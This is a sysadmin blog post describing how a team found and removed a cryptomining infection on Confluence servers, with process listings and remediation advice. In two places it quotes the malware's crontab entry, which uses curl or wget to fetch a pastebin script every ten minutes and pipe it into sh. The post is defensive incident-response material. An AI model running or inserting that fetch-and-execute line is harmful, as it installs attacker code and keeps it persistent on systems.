This post was co-authored with Bob Wen.
It's very rare that we get to write in the style of our favorite blogger, Dr. John Watson, but something happened this week that seemed like it leaped out of the pages of The Strand.
At Isos, we recently started seeing a rash of Confluence servers going down at our clients' sites.
Once we logged in, we ran "top" on one of the Confluence servers and came across the following:
The "normal" Confluence process (seen as a Java command) was taken over, replaced by a "khugepageds" process.
We then discovered that we weren't alone...
So, an exploit was taking advantage of a security vulnerability in Confluence and mining cryptocurrency! If we tried killing the khugepageds process and removed the crontab job, a separate process restarted and recreated the crontab job!
Here's how we took care of this malware.
CentOS/RHEL based OS:
This issue is slightly different in RedHat based OS's.
[root@fcrwprlnjiraapp2 ~]# ps -ef | grep 9001 9001 2883 1 0 Apr15 ? 00:02:02 sh 9001 4117 1 0 Apr15 ? 00:00:00 sh 9001 5283 1 3 Apr15 ? 00:34:17 /usr/bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/current/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dconfluence.context.path= -Datlassian.plugins.startup.options= -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dsynchrony.enable.xhr.fallback=true -Xms1024m -Xmx1024m -XX:+UseG1GC -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -XX:G1ReservePercent=20 -Xloggc:/opt/atlassian/confluence/current/logs/gc-2019-04-15_16-23-20.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -XX:-PrintGCDetails -XX:+PrintGCDateStamps -XX:-PrintTenuringDistribution -Dignore.endorsed.dirs= -classpath /opt/atlassian/confluence/current/bin/bootstrap.jar:/opt/atlassian/confluence/current/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence/current -Dcatalina.home=/opt/atlassian/confluence/current -Djava.io.tmpdir=/opt/atlassian/confluence/current/temp org.apache.catalina.startup.Bootstrap start
9001 11280 1 0 Apr15 ? 00:00:05 /usr/sbin/atd 9001 11541 1 99 Apr15 ? 1-01:11:53 dblaunchs 9001 30041 4117 0 09:31 ? 00:00:00 sleep 30 root 30151 29799 0 09:31 pts/6 00:00:00 grep 9001 9001 31778 5283 0 Apr15 ? 00:04:32 /usr/java/jdk1.8.0_51/jre/bin/java -classpath /opt/atlassian/confluence/current/temp/2.1.0-release-confluence_6.5-1a01ab2d.jar:/opt/atlassian/confluence/atlassian-confluence-6.6.4/confluence/WEB-INF/lib/mysql-connector-5.1.26.jar -Xss2048k -Xmx1g synchrony.core sql
Instead of crontab, this exploit was using the AT job scheduler. The process "dblaunchs" was the one eating all the CPU, but killing that process wasn't enough.
The only legitimate processes here are the 2 Java processes (Confluence and Synchrony). Everything else must go.
Ubuntu/Debian based OS
Upon logging in, the first thing we noticed was there were a couple of strange processes running on the Confluence servers. That led me to this article.
... which prompted us to check the 'confluence' user's crontab jobs.
You can check this as the
root user with
crontab -l -u <confluence_user>, where confluence_user is the Unix account responsible from running the Confluence process.
root@@atlassian-confluence-prod-tp1v:~$ su - confluence confluence@atlassian-confluence-prod-tp1v:~$ crontab -l */10 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh
Unless you have created legit cron jobs for the Confluence user, there shouldn't be anything returned.
Needless to say, I immediately removed the cron job...
confluence@atlassian-confluence-prod-tp1v:~$ crontab -r
... and about 10 seconds later, it came back even though I had killed the processes...
confluence@atlassian-confluence-prod-tp1v:~$ killall khugepageds confluence@atlassian-confluence-prod-tp1v:~$ crontab -l */10 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh
There had to be a different process that is recreated it. So we checked to see if there were any other processes running as the Confluence user and sure enough... there is another process, "[kerberods]", that is re-spawning the crontab entry and executing the CPU killing processes.
confluence@atlassian-confluence-prod-tp1v:~$ ps -ef | grep conflue\+ conflue+ 19400 1 0 18:00 ? 00:00:51 [kerberods] conflue+ 30606 1 99 21:59 ? 00:06:39 /tmp/khugepaged
How to prevent
Upgrade to a bug fix release that is appropriate for the feature release you are on currently. If this is not feasible, disabling the apps "Widget Connector" and "WebDav Plugin" should be enough to close the door.
Disabling the WebDav Plugin may have other consequences, so it might be a good excuse for an emergency downtime to get the upgrade done.
One thing we discovered is the "Edit in Office" functionality for attached MS Office files. It doesn't work without those apps enabled, and it doesn't re-enable automatically when you re-enable the others.
The best thing to do after things seem stable again is to replace the server(s). This is not always feasible, but if you are running the Confluence Data Center in AWS/GCP there is a good chance you have auto provisioning happening in some way, so server replacement might be relatively easy.